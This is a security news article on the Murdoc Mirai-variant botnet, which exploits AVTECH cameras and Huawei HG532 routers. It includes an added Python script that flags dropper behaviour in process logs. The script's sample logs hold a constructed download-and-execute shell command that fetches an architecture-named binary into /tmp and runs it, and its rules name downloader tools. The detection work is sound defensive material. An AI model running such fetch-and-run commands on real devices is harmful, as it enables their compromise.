Cybersecurity researchers have identified an extensive campaign that exploits vulnerabilities in AVTECH IP cameras and Huawei HG532 routers. The campaign has largely succeeded in integrating these devices into a Mirai botnet variant known as the Murdoc Botnet.

The ongoing operations reflect a significant escalation in capabilities, as noted by Qualys security researcher Shilpesh Trivedi, who emphasized that the exploitation of these vulnerabilities has allowed attackers to compromise devices and expand their botnet networks substantially.

This malicious campaign has reportedly been active since at least July 2024, with over 1,370 affected systems tracked thus far. Notably, a substantial proportion of these infections have been confirmed in countries such as Malaysia, Mexico, Thailand, Indonesia, and Vietnam.

Research indicates that the botnet capitalizes on known security flaws—specifically CVE-2017-17215 and CVE-2024-7029—to gain an initial foothold on Internet of Things (IoT) devices. Once access is obtained, a shell script is executed that downloads further malicious payloads selected according to the system’s CPU architecture. The overarching objective of these attacks is to use the botnet to launch distributed denial-of-service (DDoS) attacks.

As of now, there are estimated to be more than 37,995 exposed AVTECH cameras globally, with the majority located in regions such as Taiwan, Vietnam, Indonesia, the United States, and Sri Lanka. This widespread exposure underscores the heightened risk associated with these particular devices.

In the weeks leading up to this revelation, another variant of the Mirai botnet—termed gayfemboy—was uncovered, exploiting vulnerabilities in Four-Faith industrial routers. Prior reports had highlighted that malicious entities had been utilizing CVE-2024-7029 to co-opt AVTECH devices into botnets.

Further investigations have revealed that recent DDoS attacks targeting major Japanese corporations and banks were carried out by an IoT botnet assembled by exploiting device vulnerabilities and weak credentials. Attacks have also been reported in the U.S., Bahrain, Poland, Spain, Israel, and Russia, with the telecommunications and technology sectors notably affected.

Trend Micro has noted that the botnet includes variants derived from Mirai and BASHLITE, with commands that can launch various DDoS methods, update the malware, and enable proxy services. The attack methodology involves deploying loader malware that connects to command-and-control (C2) servers and then awaits instructions for subsequent DDoS actions.

In response to these threats, cybersecurity professionals recommend vigilant monitoring of network activity, especially for any suspicious processes launched by untrusted binaries or scripts. Keeping firmware updated and changing default usernames and passwords on susceptible devices are crucial preventive measures.
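The monitoring recommendation above can be made concrete with a small detection pass over process-execution logs. The following is an added example written for this article, not code from Qualys, Trend Micro, Censys or any vendor; it looks for the behaviour the article describes (a shell script fetching a payload named for a CPU architecture and executing it, typically from a world-writable directory) rather than for any specific sample. The log format, the list of network-facing services, the architecture-name patterns and all sample log lines are constructed assumptions for illustration; real deployments would map the same rules onto whatever process-audit source the devices or a network sensor actually provide.

```python
import os
import re
from dataclasses import dataclass, field

# Assumed log format: one process start per line, key=value fields.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) "
    r"user=(?P<user>\S+) cmd=(?P<cmd>.*)$"
)

# Downloader tools commonly present on embedded Linux.
DOWNLOAD_TOOL_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# "make executable" or "run the thing just fetched" in the same command line.
EXEC_AFTER_RE = re.compile(r"chmod\s+\+x|chmod\s+[0-7]*7[0-7]*\b|;\s*\./|&&\s*\./")
# Directories an attacker can write to on a locked-down device.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/")
# Assumed: payload file names keyed by CPU architecture, as the article describes.
ARCH_NAME_RE = re.compile(r"\b(arm[4-7]?|mips(el)?|x86(_64)?|i[3-6]86|sh4|ppc|m68k|spc)\b")
# Assumed list of listening services that should never spawn an interactive shell.
NETWORK_SERVICES = {"httpd", "lighttpd", "upnpd", "telnetd", "boa"}
SHELLS = {"sh", "bash", "ash", "busybox"}

# Constructed sample lines (not from the article or any real capture).
SAMPLE_LOGS = [
    "2024-07-15T02:11:03Z host=cam-01 pid=412 ppid=1 user=root cmd=/usr/sbin/httpd",
    "2024-07-15T02:11:05Z host=cam-01 pid=980 ppid=412 user=root "
    "cmd=sh -c 'cd /tmp; wget http://203.0.113.10/arm7.bin; chmod +x arm7.bin; ./arm7.bin'",
    "2024-07-15T02:11:09Z host=cam-01 pid=981 ppid=980 user=root cmd=/tmp/arm7.bin",
    "2024-07-15T03:00:00Z host=cam-02 pid=300 ppid=1 user=root cmd=/usr/bin/ntpd -p pool.ntp.org",
    "2024-07-15T03:05:00Z host=cam-02 pid=301 ppid=300 user=root "
    "cmd=wget https://updates.example.com/firmware.bin -O /mnt/update/firmware.bin",
]


@dataclass
class Finding:
    host: str
    pid: int
    cmd: str
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"], rec["ppid"] = int(rec["pid"]), int(rec["ppid"])
    return rec


def _exe(cmd):
    """Basename of the program a command line runs ('' for an empty command)."""
    parts = cmd.split()
    return os.path.basename(parts[0]) if parts else ""


def classify(cmd):
    """Return the per-command reasons a command line looks like a dropper stage."""
    reasons = []
    has_download = DOWNLOAD_TOOL_RE.search(cmd) is not None
    if has_download and EXEC_AFTER_RE.search(cmd):
        reasons.append("download-and-execute")
    if has_download and ARCH_NAME_RE.search(cmd):
        reasons.append("arch-specific-payload-name")
    parts = cmd.split()
    if parts and parts[0].startswith(WRITABLE_DIRS):
        reasons.append("exec-from-writable-dir")
    return reasons


def analyze(lines):
    """Run every rule over the log, adding a parent-process rule that needs context."""
    procs = [p for p in (parse_line(l) for l in lines) if p]
    by_pid = {(p["host"], p["pid"]): p for p in procs}
    findings = []
    for p in procs:
        reasons = classify(p["cmd"])
        parent = by_pid.get((p["host"], p["ppid"]))
        # A web or telnet daemon spawning a shell is how injected commands usually surface.
        if parent and _exe(parent["cmd"]) in NETWORK_SERVICES and _exe(p["cmd"]) in SHELLS:
            reasons.append("shell-spawned-by-network-service")
        if reasons:
            findings.append(Finding(p["host"], p["pid"], p["cmd"], reasons))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"{f.host} pid={f.pid} {', '.join(f.reasons)}: {f.cmd}")
```

The benign firmware update on cam-02 produces no finding even though it uses `wget`, because it neither marks the file executable nor runs it from a scratch directory; the rules fire on the combination of behaviours, not on the presence of a download tool alone. Tuning the service and directory lists to the device's real process tree is what keeps the false-positive rate low.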

Update

A report by the exposure management platform Censys indicates the presence of 221 Murdoc-infected hosts, primarily located in Indonesia, Singapore, Taiwan, the United States, and Hong Kong. This recent data suggests that previously reported figures may overestimate the number of compromised devices.

Censys has further clarified that some of the identified hosts exhibit “truncated” behaviors, responding on over 100 open ports—an anomaly that raises concerns regarding their authenticity as legitimate hosts.
